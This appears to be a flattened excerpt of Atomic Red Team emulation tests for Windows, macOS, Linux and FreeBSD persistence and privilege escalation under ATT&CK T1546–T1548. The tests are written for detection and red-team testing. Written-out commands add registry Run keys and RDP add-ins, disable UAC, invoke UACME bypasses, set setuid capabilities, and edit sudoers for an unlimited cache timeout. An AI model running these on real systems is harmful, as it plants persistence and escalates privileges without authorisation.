Prereq: Reg files must exist on disk at specified locations (T1546.010\src\T1546.010.reg and T1546.010\src\T1546.010-cleanup.reg)
Description: Install a shim database. This technique is used for privilege escalation and bypassing user access control.
Upon execution, "Installation of AtomicShim complete." will be displayed. To verify the shim behavior, run
the AtomicTest.exe from the \\T1546.011\\bin directory. You should see a message box appear
with "Atomic Shim DLL Test!" as defined in the AtomicTest.dll. To better understand what is happening, review
the source code files is the \\T1546.011\\src directory.
Prereq: Shim database file must exist on disk at specified location (T1546.011\bin\AtomicShimx86.sdb)
if (Test-Path "T1546.011\bin\AtomicShimx86.sdb") {exit 0} else {exit 1}
Prereq: AtomicTest.dll must exist at c:\Tools\AtomicTest.dll
if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1}
Description: Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
Description: Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing
the registry keys that were created. These keys can also be viewed using the Registry Editor.
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
Description: The following Atomic Test will create a GlobalFlag key under Image File Execution Options, also a SilentProcessExit Key with ReportingMode and MonitorProcess values. This test is similar to a recent CanaryToken that will generate an EventCode 3000 in the Application log when a command, whoami.exe for example, is executed.
Upon running Whoami.exe, a command shell will spawn and start calc.exe based on the MonitorProcess value.
Upon successful execution, powershell will modify the registry and spawn calc.exe. An event 3000 will generate in the Application log.
Description: Appends a start process cmdlet to the current user's powershell profile pofile that points to a malicious executable. Upon execution, calc.exe will be launched.
Prereq: Ensure a powershell profile exists for the current user
Description: Establish persistence via a rule run by OSX's emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
Description: This test uses PowerShell to hijack a reference to a Component Object Model by creating registry values under InprocServer32 key in the HKCU hive then calling the Class ID to be executed via rundll32.exe.
Reference: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
Prereq: DLL For testing
if (Test-Path "..\ExternalPayloads\AtomicTest.dll") {exit 0} else {exit 1}
Description: This test uses PowerShell to hijack a reference to a Component Object Model by creating registry values under InprocServer32 key in the HKCU hive then calling the Class ID to be executed via "rundll32.exe -localserver [clsid]".
This method is generally used as an alternative to 'rundll32.exe -sta [clsid]' to execute dll's while evading detection.
Reference: https://www.hexacorn.com/blog/2020/02/13/run-lola-bin-run/
Upon successful execution of this test with the default options, whenever certain apps are opened (for example, Notepad), a calculator window will also be opened.
Prereq: DLL For testing
if (Test-Path "..\ExternalPayloads\T1546.015_calc.dll") {exit 0} else {exit 1}
Description: This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute.
Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The
test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out.
References:
https://youtu.be/3gz1QmiMhss?t=1251
https://github.com/enigma0x3/windows-operating-system-archaeology
Description: The DLL pointed to by the AutodialDLL registry key is loaded every time a process connects to the internet. Attackers can gain persistent code execution by setting this key to a DLL of their choice.
The sample dll provided, AltWinSock2DLL, will launch the notepad process. Starting and stopping a web browser such as MS Edge or Chrome should result in the dll executing.
[Blog](https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/)
Prereq: AltWinSock2DLL DLL must exist on disk at specified at PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
if (Test-Path T1546\bin\AltWinSock2DLL.dll) { exit 0} else { exit 1}
Description: An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
Description: An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
# Define the process you want to start $ProcessToStart = "calc.exe"
# Invoke the Create method on the Win32_Process class to start the process $Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart}
# Check the result if ($Result.ReturnValue -eq 0) { Write-Host "Process started successfully with Process ID: $($Result.ProcessId)" } else { Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)" }
# Clean up the CIM session Remove-CimSession -CimSession $CimSession
Description: The following Atomic will create a New-CimSession on a remote endpoint and start a process usnig Invoke-CimMethod.
This is a novel way to perform lateral movement or to start a remote process.
This does require WinRM to be enabled. The account performing the run will also need to be elevated.
A successful execution will stdout that the process started. On the remote endpoint, wmiprvse.exe will spawn the given process.
T1546 - Event Triggered Execution
Adding custom debugger for Windows Error Reporting
Description: When applications hang, the Windows Error Reporting framework allows us to attach a debugger, if it is set up in the Registry.
Adding executable of choice will let the executable to auto-execute when during any application crash due to functioning of WER framework
Description: Adding ClxDllPath under Terminal Server Client subkey of HKLM hive with a path to custom DLL allows for DLL loading during execution of mstsc.exe
Cleanup:
reg delete "HKLM\SOFTWARE\Microsoft\Terminal Server Client" /v ClxDllPath /f
T1546 - Event Triggered Execution
Persistence using automatic execution of custom DLL during RDP session
Description: When remote desktop session is accepted, the system queries the key it queries the Registry key:HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\TestDVCPlugin.
If such key exists, the OS will attempt to read the Path value underneath.Once the Path is read, the DLL that it points to will be loaded via LoadLibrary.
Description: Create persistence by triggering script within ErrorHandler.cmd upon the execution of specific binaries within the oobe directory.
Upon test execution, Setup.exe will be executed to further execute script within ErrorHandlercmd to launch Notepad.
Prereq: ErrorHandler.cmd script must exist on disk at specified at PathToAtomicsFolder\T1546\bin\ErrorHandler.cmd
if (Test-Path T1546\src\ErrorHandler.cmd) { exit 0} else { exit 1}
Description: When Word starts, it searches for the registry key HKCU\Software\Microsoft\Office\\Word\Options\STARTUP-PATH and if it exists,
it will treat it as a user specific start-up folder and load the contents of the folder with file extensions of .wll,.lnk,.dotm,.dot,.dotx
The registry key can be abused to load malware from the mentioned path. Reboot might be required.
Description: Run Key Persistence
Upon successful execution, cmd.exe will modify the registry by adding \"Atomic Red Team\" to the Run key. Output will be via stdout.
Cleanup:
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1
T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Description: RunOnce Key Persistence.
Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout.
Description: vbs files can be placed in and ran from the startup folder to maintain persistance. Upon execution, "T1547.001 Hello, World VBS!" will be displayed twice.
Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
folder and will also run when the computer is restarted and the user logs in.
Description: jse files can be placed in and ran from the startup folder to maintain persistance.
Upon execution, "T1547.001 Hello, World JSE!" will be displayed twice.
Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
folder and will also run when the computer is restarted and the user logs in.
Description: bat files can be placed in and executed from the startup folder to maintain persistance
Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
folder and will also run when the computer is restarted and the user logs in.
Description: Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists.
Description: Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf)
User have to clic on the recycle bin to lauch the payload (here calc)
Description: This Atomic will create a registry key called socks5_powershell for persistance access
https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c
Description: This test will modify the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders -V "Common Startup"
value to point to a new startup folder where a payload could be stored to launch at boot. *successful execution requires system restart
Description: This test will modify the HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders -V "Startup" value
to point to a new startup folder where a payload could be stored to launch at boot. *successful execution requires system restart
Description: This test will create a new value under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run to launch calc.exe on boot.
*Requires reboot
Description: This test will create a HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run key value to launch calc.exe on boot.
*Requires reboot
Description: This test will append a command to the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit value to launch calc.exe on boot.
* Requires reboot
Description: This test change the default value of HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell from "explorer.exe" to the full path of "C:\Windows\explorer.exe"
to log a change to the key's default value without breaking boot sequence.
An atacker will alternatively replace this with a custom shell.
Description: secedit allows to manipulate the HKLM hive of the Windows registry. This test creates a Run key with the keyname calc having calc.exe as the value in the HKLM hive.
[Reference](https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d)
Description: This test modifies the BootExecute registry value to "autocheck autoche *", which can be used to simulate an adversary's attempt to tamper with the system's boot process.
Reference - https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf
NOTE that by not saving the correct value, you may inhibit your system from booting properly. Only run on a test system. There is a reg export before running the Atomic.
Description: When a users logs in to a computer via RDP,Windows will search for the key in HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd registry
By default, rdpclip is the value stored. An attacker with administrator privileges can alter the value stored to allow for the custom application to execute during RDP login session.The test will allow running cal rather rdpclip when a user logs in via RDP
Description: Microsoft allows users to define a custom boot verification program for those situations by creating the registry key “HKLM\System\CurrentControlSet\Control\BootVerificationProgram” and setting the value of ImagePath to the path of boot verification program.Threat Actor
can abuse by creating this registry key and providing a malicious application to be executed during successful boot
Description: This atomic test add persistence taking advantage of the Windows Context Menu [Hexacorn](https://www.hexacorn.com/blog/2018/07/29/beyond-good-ol-run-key-part-82/)
User have to right click on the main screen or in the white space of the opened folder (e.g. Size Modify).
Description: Establishes persistence using a custom authentication package for the Local Security Authority (LSA).
After a reboot, Notepad.exe will be executed as child process of lsass.exe.
Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.002/package
[Related blog](https://pentestlab.blog/2019/10/21/persistence-security-support-provider/)
Description: Establishes persistence by creating a new time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
The new time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt
in C:\Users\Public\ as validation that the test is successful.
Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/
Cleanup:
net stop w32time reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /f rm -force C:\Users\Public\AtomicTest.dll net start w32time
Description: Establishes persistence by editing the NtpServer time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
The time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt
in C:\Users\Public\ as validation that the test is successful.
Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/
Description: PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
Description: PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
Description: PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon.
Please note that Winlogon Notifications have been removed as of Windows Vista / Windows Server 2008 and that this test thus only applies to erlier versions of Windows.
Description: PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
Description: PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
Description: Add a value to a Windows registry Security Support Provider pointing to a payload .dll which will normally need to be copied in the system32 folder.
A common DLL used with this techquite is the minilib.dll from mimikatz, see https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
Description: The following Atomic Test will write an file, comadmin.dat, to disk. From the report, Snake's installer drops the kernel driver and a custom DLL which is used to load the driver into a
single AES encrypted file on disk. Typically, this file is named “comadmin.dat” and is stored in the %windows%\system32\Com directory.
This Atomic Test will write a hardcoded named file to disk in the com directory named comadmin.dat.
[Snake Malware - CISA](https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF)
Description: Mac Defaults
[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html)
T1547.007 - Boot or Logon Autostart Execution: Re-opened Applications
Append to existing loginwindow for Re-Opened Applications
FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1` if [ -z "${FILE}" ] ; then echo "No loginwindow plist file found" && exit 1 ; fi echo save backup copy to /tmp/ cp ${FILE} /tmp/t1547007_loginwindow-backup.plist echo before plutil -p ${FILE} echo overwriting... /tmp/t1547007_append_exe ${FILE} && echo after && plutil -p ${FILE}
Description: Appends an entry to launch Calculator hidden loginwindow.*.plist for next login.
Note that the change may not result in the added Calculator program launching on next user login.
It may depend on which version of macOS you are running on.
Prereq: compile C program
if [ -f "/tmp/t1547007_append_exe" ]; then exit 0 ; else exit 1; fi
Cleanup:
rm -f /tmp/t1547007_append_exe # revert to backup copy FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1` if [ -z "${FILE}" ] ; then exit 0 fi mv /tmp/t1547007_loginwindow-backup.plist ${FILE}
T1547.008 - Boot or Logon Autostart Execution: LSASS Driver
Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt
Description: The following Atomic will modify an undocumented registry key that may be abused to load a arbitrary DLL into LSASS.
Upon execution, the registry key will be modified and a value will contain the path to the DLL.
Reference: https://blog.xpnsec.com/exploring-mimikatz-part-1/ and source https://github.com/oxfemale/LogonCredentialsSteal
Note that if any LSA based protection is enabled, this will most likely not be successful with LSASS.exe loading the DLL.
Prereq: lsass_lib.dll must exist on disk at specified location (..\ExternalPayloads\lsass_lib.dll)
if (Test-Path "..\ExternalPayloads\lsass_lib.dll") {exit 0} else {exit 1}
Description: This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell;
gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL.
Upon execution, calc.exe will be launched.
Cleanup:
del -f %temp%\T1547.009_modified_shortcut.url >nul 2>&1
T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification
Description: LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
to view the new shortcut.
Description: Add key-value pair to a Windows Port Monitor registry. On the subsequent reboot DLL will be execute under spoolsv with NT AUTHORITY/SYSTEM privilege.
Description: Establishes persistence by creating a new print processor registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors.
The new print processor will point to a DLL which will be loaded by the spooler service after a reboot. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful.
Note: The test assumes a x64 Windows operating system.
The payload source code is based on a blog post by stmxcsr: [https://stmxcsr.com/persistence/print-processor.html](https://stmxcsr.com/persistence/print-processor.html)
Description: This test will create an "atomic_test" key under 'HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components' to launch calc by configuring an active setup executable and
forcing to run active setup using the "runonce.exe /AlternateShellStartup" command.
Without the "runonce.exe /AlternateShellStartup" command it would run during the next logon for each user.
Note: If you logout before running the cleanup command, you will be required to go through the OOBE (out-of-box experience) setup sequence to log back in.
The payload will only run once unless the cleanup command is run in between tests.
[Active Setup Explained](https://helgeklein.com/blog/active-setup-explained/)
Description: This test will add a StubPath entry to the Active Setup native registry key associated with 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600})
Said key doesn't have a StubPath value by default, by adding one it will launch calc by forcing to run active setup using runonce.exe /AlternateShellStartup.
Without the last command it will normally run on next user logon. Note: this test will only run once successfully if no cleanup command is run in between test.
Description: This test will decrease the version number of the 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) registry key for the current user,
which will force the StubPath payload (if set) to execute.
T1547.015 - Boot or Logon Autostart Execution: Login Items
T1547.015 - Boot or Logon Autostart Execution: Login Items
Add macOS LoginItem using Applescript
osascript T1547.015/src/add_login_item.osa
Description: Runs osascript on a file to create new LoginItem for current user.
NOTE: Will popup dialog prompting user to Allow or Deny Terminal.app to control "System Events"
Therefore, it can't be automated until the TCC is granted.
The login item launches Safari.app when user logs in, but there is a cleanup script to remove it as well.
In addition to the `osascript` Process Events, file modification events to
`/Users/*/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm` should be seen.
Description: Install a driver via pnputil.exe lolbin
T1547 - Boot or Logon Autostart Execution
Driver Installation Using pnputil.exe
pnputil.exe -i -a C:\Windows\INF\acpipmi.inf
Description: pnputil.exe is a native command-line utility in Windows to install drivers, this can be abused by to install malicious drivers. Ref: https://lolbas-project.github.io/lolbas/Binaries/Pnputil/
T1547 - Boot or Logon Autostart Execution
Leverage Virtual Channels to execute custom DLL during successful RDP session
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default\Addins\Malware" /v Name /t REG_SZ /d "C:\Windows\System32\amsi.dll" /f
Description: Virtual Channels can be leveraged to alter RDP behavior using dedicated Addins.The mechanism is implemented using DLLs which can be executed during RDP session automatically.
The DLLs are loaded in the host system only after successful connection is established with the remote system.
Once the test is run, amsi.dll will be loaded on the host system during successful RDP session.
Blog :https://learn.microsoft.com/en-us/windows/win32/termserv/terminal-services-virtual-channels?redirectedfrom=MSDN
Cleanup:
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default\Addins\Malware" /f
T1548.001 - Abuse Elevation Control Mechanism: Setuid and Setgid
Description: This test sets the SetGID flag on a file in FreeBSD.
Cleanup:
rm /tmp/evilBinary
T1548.001 - Abuse Elevation Control Mechanism: Setuid and Setgid
Make and modify capabilities of a binary
cp T1548.001/src/cap.c /tmp/cap.c make /tmp/cap sudo setcap cap_setuid=ep /tmp/cap /tmp/cap
Description: Make and modify [capabilities](https://man7.org/linux/man-pages/man7/capabilities.7.html) of a C source code file.
The binary doesn't have to modify the UID, but the binary is given the capability to arbitrarily modify it at any time with `setuid(0)`.
Without being owned by root, the binary can set the UID to 0.
Cleanup:
rm /tmp/cap rm /tmp/cap.c
T1548.001 - Abuse Elevation Control Mechanism: Setuid and Setgid
Description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
Upon execution command prompt should be launched with administrative privileges.
Description: PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
Upon execution command prompt should be launched with administrative privalages
Description: Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened.
Description: PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
Upon execution command prompt will be opened.
Description: PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10
Upon execution administrative command prompt should open
Description: Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems
Upon execution the directory structure should exist if the system is patched, if unpatched Microsoft Management Console should launch
Description: Bypasses User Account Control using a fileless method, registry only.
Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe
[Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)
Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)
Description: Disable User Account Conrol (UAC) using the builtin tool reg.exe by changing its registry key
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0
T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
Bypass UAC using SilentCleanup task
"T1548.002\src\T1548.002.bat"
Description: Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
For example, we can set the windir registry kye to: "cmd /k REM "
And forcefully run SilentCleanup task:
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
UACME Bypass Method 23
"..\ExternalPayloads\uacme\23 Akagi64.exe"
Description: Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
Author: Leo Davidson derivative
Type: Dll Hijack
Method: IFileOperation
Target: \system32\pkgmgr.exe
Component: DismCore.dll
Implementation: ucmDismMethod
UCM Method: UacMethodDISM
https://github.com/hfiref0x/UACME
Prereq: UACME executable must exist on disk at specified location ("..\ExternalPayloads\uacme\23 Akagi64.exe")
T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
UACME Bypass Method 31
"..\ExternalPayloads\uacme\31 Akagi64.exe"
Description: Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
Author: Enigma0x3
Type: Shell API
Method: Registry key manipulation
Target: \system32\sdclt.exe
Component: Attacker defined
Implementation: ucmSdcltIsolatedCommandMethod
UCM Method: UacMethodShellSdclt
https://github.com/hfiref0x/UACME
Prereq: UACME executable must exist on disk at specified location ("..\ExternalPayloads\uacme\31 Akagi64.exe")
T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
UACME Bypass Method 33
"..\ExternalPayloads\uacme\33 Akagi64.exe"
Description: Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
Author: winscripting.blog
Type: Shell API
Method: Registry key manipulation
Target: \system32\fodhelper.exe
Component: Attacker defined
Implementation: ucmShellRegModMethod
UCM Method: UacMethodMsSettings2
https://github.com/hfiref0x/UACME
Prereq: UACME executable must exist on disk at specified location ("..\ExternalPayloads\uacme\33 Akagi64.exe")
T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
UACME Bypass Method 34
"..\ExternalPayloads\uacme\34 Akagi64.exe"
Description: Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
Author: James Forshaw
Type: Shell API
Method: Environment variables expansion
Target: \system32\svchost.exe via \system32\schtasks.exe
Component: Attacker defined
Implementation: ucmDiskCleanupEnvironmentVariable
UCM Method: UacMethodDiskSilentCleanup
https://github.com/hfiref0x/UACME
Prereq: UACME executable must exist on disk at specified location ("..\ExternalPayloads\uacme\34 Akagi64.exe")
T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
UACME Bypass Method 39
"..\ExternalPayloads\uacme\39 Akagi64.exe"
Description: Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
Author: Stefan Kanthak
Type: Dll Hijack
Method: .NET Code Profiler
Target: \system32\mmc.exe
Component: Attacker defined
Implementation: ucmCorProfilerMethod
UCM Method: UacMethodCorProfiler
https://github.com/hfiref0x/UACME
Prereq: UACME executable must exist on disk at specified location ("..\ExternalPayloads\uacme\39 Akagi64.exe")
T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
UACME Bypass Method 56
"..\ExternalPayloads\uacme\56 Akagi64.exe"
Description: Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
Author: Hashim Jawad
Type: Shell API
Method: Registry key manipulation
Target: \system32\WSReset.exe
Component: Attacker defined
Implementation: ucmShellRegModMethod
UCM Method: UacMethodShellWSReset
https://github.com/hfiref0x/UACME
Prereq: UACME executable must exist on disk at specified location ("..\ExternalPayloads\uacme\56 Akagi64.exe")
T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
UACME Bypass Method 59
"..\ExternalPayloads\uacme\59 Akagi64.exe"
Description: Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
Author: James Forshaw
Type: AppInfo ALPC
Method: RAiLaunchAdminProcess and DebugObject
Target: Attacker defined
Component: Attacker defined
Implementation: ucmDebugObjectMethod
UCM Method: UacMethodDebugObject
https://github.com/hfiref0x/UACME
Prereq: UACME executable must exist on disk at specified location ("..\ExternalPayloads\uacme\59 Akagi64.exe")
T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
UACME Bypass Method 61
"..\ExternalPayloads\uacme\61 Akagi64.exe"
Description: Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.
Author: Enigma0x3/bytecode77 derivative by Nassim Asrir
Type: Shell API
Method: Registry key manipulation
Target: \system32\slui.exe, \system32\changepk.exe
Component: Attacker defined
Implementation: ucmShellRegModMethod
UCM Method: UacMethodDebugObject
https://github.com/hfiref0x/UACME
Prereq: UACME executable must exist on disk at specified location ("..\ExternalPayloads\uacme\61 Akagi64.exe")
Description: Disable User Account Conrol (UAC) for admin by setting the registry key
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin to 0.
[MedusaLocker Ransomware](https://cloudsek.com/technical-analysis-of-medusalocker-ransomware/),
[Purple Fox Rootkit](https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit),
[Avaddon Ransomware](https://blogs.blackberry.com/en/2021/06/threat-thursday-avaddon-ransomware-uses-ddos-attacks-as-triple-threat)
Description: The following UAC bypass is focused on a registry key under "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command" that will trigger a command once wsreset.exe runs.
This bypass is limited to Windows 10 1803/1809 and may not run on Server platforms. The registry mod is where interest will be.
If successful, the command to run will spawn off wsreset.exe.
[UAC Bypass in Windows 10 Store Binary](https://0x1.gitlab.io/exploit/UAC-Bypass-in-Windows-10-Store-Binary/)
Description: User Account Control (UAC) is a security mechanism for limiting the elevation of privileges, including administrative accounts, unless authorized.
This setting ensures that the elevation prompt is only used in secure desktop mode.
Disable User Account Conrol (UAC) for secure desktop by setting the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop to 0.
Description: This atomic regarding UACDisableNotify pertains to the notification behavior of UAC. UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. The BlotchyQuasar RAT defense evasion activities that the adversary to disable UAC notifications makes it easier for malware and malicious software to execute with elevated privileges. [Article](https://securityintelligence.com/x-force/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan/)
Description: This atomic regarding setting ConsentPromptBehaviorAdmin to 0 configures the UAC so that it does not prompt for consent or credentials when actions requiring elevated privileges are performed by users in the administrators group. This means that any operation that would normally trigger a UAC prompt will proceed automatically without user interaction.
T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Sudo usage
sudo -l sudo cat /etc/sudoers sudo vim /etc/sudoers
Description: Common Sudo enumeration methods.
T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Sudo usage (freebsd)
sudo -l sudo cat /usr/local/etc/sudoers sudo ee /usr/local/etc/sudoers
Description: Common Sudo enumeration methods.
Prereq: Check if sudo is installed.
if [ ! -x "$(command -v sudo)" ]; then exit 1; else exit 0; fi;
T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Unlimited sudo cache timeout
sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers sudo visudo -c -f /etc/sudoers
Description: Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.
T1548.003 - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Unlimited sudo cache timeout (freebsd)
